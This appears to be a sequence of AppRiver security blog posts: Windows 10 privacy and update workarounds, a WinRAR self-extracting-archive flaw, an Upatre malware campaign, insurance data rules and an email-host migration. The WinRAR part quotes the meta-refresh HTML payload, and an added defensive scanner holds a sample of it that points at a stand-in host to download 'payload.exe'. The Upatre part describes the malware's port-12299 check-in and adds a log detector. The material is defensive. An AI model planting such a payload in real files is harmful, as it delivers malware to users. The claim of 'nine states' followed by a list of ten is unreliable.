By Michael Imlay

Windows 10 is a step toward more personal computing and a more mobile world. As customers and partners embark on the Windows 10 journey, we thought it would be useful to list some of the issues we’re hearing about and discuss viable workarounds.


  • Forced Automatic Updates for Windows 10 Home Edition

Windows 10 Home Edition has automatic updates that cannot be disabled, while Windows 10 Professional Edition allows you to defer updates up to a few months, after which they will be installed automatically.

You can only uninstall or disable updates and upgrades after they have been installed; you cannot choose to simply skip an update, even for apps from the Windows Store. This has both good and bad implications. The good: from a security standpoint, your system will always be up to date with the latest security updates and patches. The bad: updates sometimes break systems and cause issues, and you will be the guinea pig. For example, Windows 10 pushed an nVidia driver update that left many systems unbootable and forced many users to reinstall Windows. A security update was also pushed out that left many users stuck in a “boot loop”, unable to boot into Windows.

Even with these drawbacks, forced updates will make systems much more secure overall: every security patch will be pushed to your system, allowing Microsoft to roll out fixes quickly and preventing your system from being compromised. In the past, many users did not install updates on previous versions of Windows, which put their systems, and others, at risk. This changes all that.

You can set up Windows Update to prompt you before restarting instead of restarting automatically, and you can enable Defer upgrades. Both options are under Start/Settings/Update and Security/Windows Update/Advanced Options.

  • Cortana Comes with Strings

Under the default “Express” settings, Windows 10 is configured to send various information to Microsoft and other parties: it collects user contacts, calendar data, and “associated input data” to personalize “speech, typing, and inking input”; it collects typing and inking data to improve recognition; it lets apps use a unique “advertising ID” for analytics and advertising personalization (functionality introduced in Windows 8.1); and it lets apps request the user’s location data and send it to Microsoft and “trusted partners” to improve location detection (Windows 8 had similar settings, except that location data collection did not include “trusted partners”).

Users can opt out of most of this data collection, but telemetry data for error reporting and usage is also sent to Microsoft, and this cannot be disabled on non-enterprise versions of Windows 10. Using Cortana also requires the collection of data “such as your device location, data from your calendar, the apps you use, data from your emails and text messages, who you call, your contacts and how often you interact with them on your device” to personalize its functionality. The Microsoft Services Agreement states that the company’s online services may automatically “download software updates or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices.”

Critics interpreted this statement as implying that Microsoft would scan for and delete pirated software installed on devices running Windows 10. Additionally, Windows 10 has a feature, enabled by default, that shares your WiFi passwords with your contacts. This means that when you connect to your personal WiFi network at home, the password is shared with all your contacts, so if they visit your home their Windows 10 systems will connect to your network automatically without ever being given the WiFi password. This could pose a security risk.

However, do not fear! Thankfully, Microsoft provides a dedicated Privacy section under Settings that lets you disable most of these options. You can reach it by going to Start/Settings/Privacy. You can also disable WiFi Sense (so that your networks and passwords aren’t shared with your contacts) by going to Settings > Network & Internet > Wi-Fi > Manage Wi-Fi settings. There, you basically want to disable every option you see and tell Windows 10 to forget any Wi-Fi networks you’ve signed into in the past.

  • Windows 10 Driver Model

Windows 10 introduces the new WDDM 2.0 driver model, including DirectX 12 (a Windows 10 exclusive for gamers). This is overall a better driver model, and as long as your hardware is supported in Windows 10 there shouldn’t be any issues upgrading. However, many devices are unsupported or have issues under the new driver model. As an example, I attempted to upgrade my work laptop (a Dell Latitude) to Windows 10, but an issue with the video drivers under Windows 10 prevented me from using my third monitor. I spent countless hours trying to get the third monitor to work but ended up having to revert to Windows 8.1. At home, my HP Photosmart D110 was unstable under Windows 10: the printer worked, but the scanner function did not. Additionally, my GeForce GTX 980 Ti video card (a new $700 card) was initially listed as unsupported when Windows 10 was released (this has since been fixed). So the key point is to make sure your hardware is fully supported and always to have a fallback option in case something turns out to be unsupported.

  • New Start Menu Limitations

If you are a power user with a lot of applications installed, the new Start menu may break: more than 500 items in the Start menu will break it.

  • Distributed Update System

As Windows 10 automatically downloads updates to your system, it also shares those updates with other computers on your network and on the internet. This raises a security concern, since it works much like a torrent system: other users’ computers download updates directly from your system. Sharing these updates can also slow your internet connection, and many ISPs, such as AT&T, Mediacom, and Cox, have bandwidth limits in place, so this feature is causing many users on metered connections to face overage charges.

However, you can disable or change this update sharing by going to Start/Settings/Update and Security/Windows Update/Advanced Options/Choose how updates are delivered. From here, you can disable the distributed update system completely or enable it only for devices on your own network.

  • Windows 7/8.1 users are being “forced” to upgrade to Windows 10.

If you have automatic updates enabled, Microsoft is downloading Windows 10 to your computer even if you didn’t opt in to the Windows 10 upgrade. Many people are seeing a loss of free disk space (3.5 GB to 6 GB) because of this download, as well as overage charges on metered connections.

Researchers at Vulnerability-Lab have discovered an issue in the WinRAR software that allows remote code execution through self-extracting exe files. Self-extracting archives (SFX files) are executable files that contain the code needed to extract their contents without an extractor being pre-installed. So you could send someone one of these self-extracting files without worrying about whether they already have something like WinRAR or 7zip installed. This can be convenient when dealing with external clients whose software you may not know.

The issue has to do with the display text section of the SFX file, which is shown when the file is opened. The text section supports HTML and can retrieve that HTML content remotely. In the proof of concept provided by Vulnerability-Lab, the HTML points to a server hosting malicious executables, and WinRAR downloads and executes the remote file.


Simple HTML like this in the text window could point to the server containing malicious code to be executed:

<html><head><title>poc</title><META http-equiv="refresh" content="0;URL="></head></html>

One thing I noticed that does work is WinRAR’s right-click option to extract the file. This skips the display window where the malicious HTML may be lurking and simply extracts the original file. That, of course, doesn’t mean the extracted file itself is safe.

Since the HTML is interpreted as soon as the SFX file is opened, no other user interaction is required for the vulnerability to be exploited. The original archived file doesn’t even need to be extracted; simply opening the file is enough. I was able to recreate this fairly simply, so this could be something we see in future malware campaigns. Since the SFX file still carries an exe extension, hopefully most users are already cautious enough about unknown exes not to open it. This is certainly a prime example of why unknown attachments should be avoided.
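As an added example (not Vulnerability-Lab’s proof of concept and not WinRAR’s own code), the following Python scanner looks at the problem from the defender’s side: it pulls any <html>...</html> region out of the raw bytes of an SFX executable and reports meta-refresh targets, network URLs and script tags found in it, tolerating the curly quotes that pasted HTML often carries. It does not parse the RAR container; the sample bytes, the placeholder URL (example.invalid never resolves) and the function names are all constructed for this example.

```python
"""Scan a self-extracting (SFX) executable for an HTML display text that
navigates to, or pulls in, remote content. Added example: it inspects raw
bytes for an <html>...</html> region and does not parse the RAR container."""
import re

# Straight, curly and double-prime quote characters: HTML typed into a text
# window is often pasted from a word processor, so quotes may not be ASCII.
_Q = '["\'\u201c\u201d\u2033]'
_NOT_Q = '[^\\s<>"\'\u201c\u201d\u2033]'

HTML_BLOCK_RE = re.compile(r"<html\b.*?</html\s*>", re.IGNORECASE | re.DOTALL)
META_TAG_RE = re.compile(r"<meta\b[^>]*>", re.IGNORECASE | re.DOTALL)
REFRESH_RE = re.compile(r"http-equiv\s*=\s*" + _Q + r"?\s*refresh", re.IGNORECASE)
REFRESH_URL_RE = re.compile(
    r"content\s*=\s*" + _Q + r"?\s*\d+\s*;\s*url\s*=\s*" + _Q + "?\\s*(" + _NOT_Q + "+)",
    re.IGNORECASE,
)
NETWORK_URL_RE = re.compile(r"\b(?:https?|ftp|file)://" + _NOT_Q + "+", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)


def html_blocks(data: bytes) -> list:
    """Return every <html>...</html> region found in the raw file bytes."""
    text = data.decode("utf-8", errors="replace")   # binary noise becomes U+FFFD
    return HTML_BLOCK_RE.findall(text)


def refresh_targets(html: str) -> list:
    """URLs that a <meta http-equiv="refresh"> in this HTML would navigate to."""
    targets = []
    for tag in META_TAG_RE.findall(html):
        if REFRESH_RE.search(tag):
            m = REFRESH_URL_RE.search(tag)
            if m:
                targets.append(m.group(1))
    return targets


def scan_sfx(data: bytes) -> dict:
    """Summarise what the display text of an SFX would do when it is shown."""
    blocks = html_blocks(data)
    targets = [t for b in blocks for t in refresh_targets(b)]
    urls = sorted({u for b in blocks for u in NETWORK_URL_RE.findall(b)})
    has_script = any(SCRIPT_RE.search(b) for b in blocks)
    suspicious = bool(targets or urls or has_script)
    return {
        "is_pe": data[:2] == b"MZ",        # an SFX archive is still an .exe
        "html_blocks": len(blocks),
        "refresh_targets": targets,
        "network_urls": urls,
        "has_script": has_script,
        "verdict": "suspicious" if suspicious else "clean",
    }


# Constructed sample: a fake PE header, then a display text like the one in the
# article, with a placeholder URL and curly quotes as pasted text would have.
SAMPLE_SFX = (
    b"MZ\x90\x00" + b"\x00" * 32
    + (
        "<html><head><title>poc</title>"
        "<META http-equiv=\u201drefresh\u201d "
        "content=\u201d0;URL=http://example.invalid/payload.exe\u201d>"
        "</head></html>"
    ).encode("utf-8")
    + b"\x00" * 16
)

# Constructed benign sample: plain text only, no navigation or remote content.
SAMPLE_CLEAN = b"MZ\x90\x00" + b"<html><body>Thanks for installing.</body></html>"

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_SFX), ("clean", SAMPLE_CLEAN)):
        print(name, scan_sfx(blob))
```

Because the scanner works on raw bytes, it can be pointed at any attachment that starts with a PE header; a display text with no network URL, no refresh and no script is reported as clean, which is the normal case for a legitimate SFX.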

This morning we’ve been seeing yet another offering from the Upatre guys. This time it comes in with a rather lengthy, by comparison, email with the subject line “Attorney-client agreement”. This story line certainly leaves out a few major details as it begins with a lawyer apparently already in court fighting against some sort of breach of contract suit against the recipient. The opening paragraph even forgives the intended targets for missing court this morning, citing that the court “understood”. This must come as a real shock to those of us who don’t keep a lawyer on retainer and those who didn’t realize they were being sued. It probably would’ve been really nice of this mystery lawyer to let you know that this was going on before it got to this point, I would think.


Regardless, the email goes on to give a vague report on what happened in court that day and a few things the new defendant can expect as this fake lawsuit unfolds. This is a very classic, although slightly long-winded, social engineering technique employed by cyber thieves to raise a little fear and a lot of curiosity in their victims, which will hopefully entice them into falling for the ruse. The payload in this attack lives in an accompanying attachment. Each of these attachments is quasi-randomly named by stringing together three words from an apparent wordlist supplied by the command and control server. This randomization makes these files slightly harder to pin down, simply because one cannot block on the filename alone. Otherwise, it’s business as usual when it comes to stopping these nuisances.


One interesting detail about this line of attacks is that they seem to be targeting older, out-of-date PCs. After running the samples on a couple of different operating systems, they only seemed to want to carry out their malicious intent on machines running Windows XP (I was using SP3). On newer versions the malware shut itself down almost immediately after execution. Once operational, though, it begins to hijack system processes to get a foothold on its new victim. It then reaches out to check its IP address and then communicates with an IP on port 12299, where it reports back information about the new target such as the IP it had just looked up and the computer name. Following this, the malware adds a good number of registry entries dealing with security certificates, mostly disallowing them, and looks around for debugging tools.

Even on Windows XP these samples seemed a little rickety, as they tended to crash after a fairly short time, but they did have the best success rate on the XP machines. I wouldn’t be surprised if this little issue is quickly resolved and we start seeing the next campaign from these guys within the day. Seeing several different themes from this particular family of malware has been commonplace and has been happening daily for quite some time now.
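The network behaviour described above (an outbound IP lookup, then a report-back to an address on TCP port 12299) is simple enough to hunt for in egress logs. The following Python is an added example, not AppRiver’s or SecureTide’s detection code; the log line format, the IP-lookup hostnames and every address in the sample are constructed for this illustration, and only the port number comes from the post.

```python
"""Flag hosts whose outbound traffic matches the sequence described above:
an external IP lookup followed by a connection to TCP port 12299. Added
example; the log format, lookup hostnames and addresses are constructed."""
import re
from datetime import datetime, timezone

# Constructed: services whose only purpose is to echo the client's public IP.
IP_LOOKUP_HOSTS = {"ipcheck.example", "whatismyip.example"}
C2_PORT = 12299        # the report-back port named in the post
WINDOW_SECONDS = 300   # how closely the port-12299 contact must follow the lookup

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ)\s+(?P<kv>.+)$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str):
    """Parse one 'timestamp key=value ...' record; return None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = dict(KV_RE.findall(m.group("kv")))
    if "src" not in rec or "dst" not in rec:
        return None
    rec["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    rec["dport"] = int(rec.get("dport", 0))
    return rec


def find_suspects(lines) -> dict:
    """Map each source host to its findings.

    'high'   = IP lookup followed within WINDOW_SECONDS by a port-12299 contact
    'medium' = port-12299 contact with no preceding lookup (still unusual)
    Hosts that only perform an IP lookup are not reported: that alone is normal.
    """
    last_lookup = {}   # src -> time of its most recent IP lookup
    findings = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src = rec["src"]
        if rec["dport"] in (80, 443) and rec.get("http_host") in IP_LOOKUP_HOSTS:
            last_lookup[src] = rec["ts"]
            continue
        if rec["dport"] == C2_PORT:
            seen = last_lookup.get(src)
            recent = seen is not None and (rec["ts"] - seen).total_seconds() <= WINDOW_SECONDS
            findings.setdefault(src, []).append({
                "severity": "high" if recent else "medium",
                "dst": rec["dst"],
                "ts": rec["ts"].isoformat(),
            })
    return findings


# Constructed sample log: 10.0.0.5 shows the full sequence, 10.0.0.9 only the
# odd port, 10.0.0.7 only a harmless IP lookup. Addresses are documentation ranges.
SAMPLE_LOG = """\
2015-10-15T13:02:10Z src=10.0.0.5 dst=203.0.113.10 dport=80 proto=tcp http_host=ipcheck.example
2015-10-15T13:02:14Z src=10.0.0.5 dst=198.51.100.23 dport=12299 proto=tcp
2015-10-15T13:05:00Z src=10.0.0.7 dst=203.0.113.44 dport=443 proto=tcp http_host=mail.example
2015-10-15T13:06:30Z src=10.0.0.9 dst=198.51.100.77 dport=12299 proto=tcp
2015-10-15T13:07:00Z src=10.0.0.7 dst=203.0.113.10 dport=80 proto=tcp http_host=ipcheck.example
this line is garbage and is skipped
""".splitlines()

if __name__ == "__main__":
    for host, hits in sorted(find_suspects(SAMPLE_LOG).items()):
        for hit in hits:
            print(f"{host}: {hit['severity']} -> {hit['dst']} at {hit['ts']}")
```

Keying on the sequence rather than on the attachment name sidesteps the randomized three-word filenames the post describes; the port-only "medium" finding is kept so a sample that skips the lookup step is still surfaced for review.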

AppRiver’s SecureTide has everyone covered though as we’re blocking these preemptively to help keep your machines happy and healthy.

By Gretchen Clarke

Not unlike other vertical market business entities, insurance companies face a growing set of regulations and guidelines for protecting their data.

With an ever-evolving IT threat landscape, hacker attacks and network intrusions, protecting sensitive customer information is a growing concern for the insurance industry.  What’s more, the insurance industry may face security concerns from both sides of the table – serving the security needs of the insurers and serving the security needs of the insured.  To help illustrate, take a look at the list of sensitive information needed in order to purchase insurance:

  • Full Name
  • Date of Birth
  • Address
  • Social Security Number
  • Payment information
  • Annual income
  • Banking information
  • Other

While this information is necessary for those wanting to be insured, have you ever wondered where your information goes?  Where it’s stored?  Is it scanned into a shared file on a network or did you complete it online?  Is it emailed to the corporate office?

In the last few years, nine states have added regulations mandating that insurance companies archive and encrypt any emails containing personal/private data.  These states include:  California, Colorado, Delaware, Massachusetts, New York, Pennsylvania, Rhode Island, South Dakota, Vermont, and West Virginia, while many other states are adopting legislation to follow suit.

It’s not just about being compliant with federal and state laws.  It’s also about building customer trust.  By enhancing your service offering with best-in-breed security solutions, you’re telling customers that their privacy matters and that you’re taking the necessary steps to keep sensitive information secure.

To those companies who have traded in photocopies for online documents and to consumers who are concerned about protecting their personal/private data, we encourage you to take a look at your security footprint today.  And, if you have any questions along the way, we are here to help.

To learn more about AppRiver’s  cloud-based email encryption and email archiving & compliance solutions, please contact  (And make sure to ask about our current promotions on compliance-ready solutions!)

Last week, managed services provider Apptix announced it is shutting down its hosted Exchange service and selling part of its cloud customer division to GoDaddy. The plan is for Apptix customers who are currently on its hosted Exchange platform to migrate to GoDaddy’s Office 365.

The question is, who do you want to host your email and who would you like to work with?

In the IT world, that choice is critical because one size rarely fits all. Customers being moved off the Apptix Exchange service would be wise to ask several questions before committing to GoDaddy Office 365 (or any other email provider, for that matter).

Quite obviously, price is one key factor, but you also need to know just what you’re getting for your money. For example, does your monthly fee cover customer care? If so, for how long? And do you speak to a live person who knows the technology?

Closely related to the question of price are your terms. What if you don’t like the new provider? Can you get your money back? Are you free to leave without penalty? And can you get month-to-month, pay-as-you-go billing?

Another issue is compatibility. In many cases, email is connected to other services like spam & virus protection, email encryption, and archiving & eDiscovery. Will your new platform support these features? And will they support your provider or do they force you to a different one?

As you discuss these issues, don’t forget to talk about security. How much control do you have over where your data is stored? How serious is the provider about protecting your information? Is it built in at every level, or is it an “after-market” option?

These are just a few of the basic questions you should pose to anyone before you allow them to host your email. For some Apptix customers, moving to GoDaddy might be a great choice, but always remember that it is your choice to make.

Have questions about AppRiver’s Secure Hosted Exchange? Click here to learn more.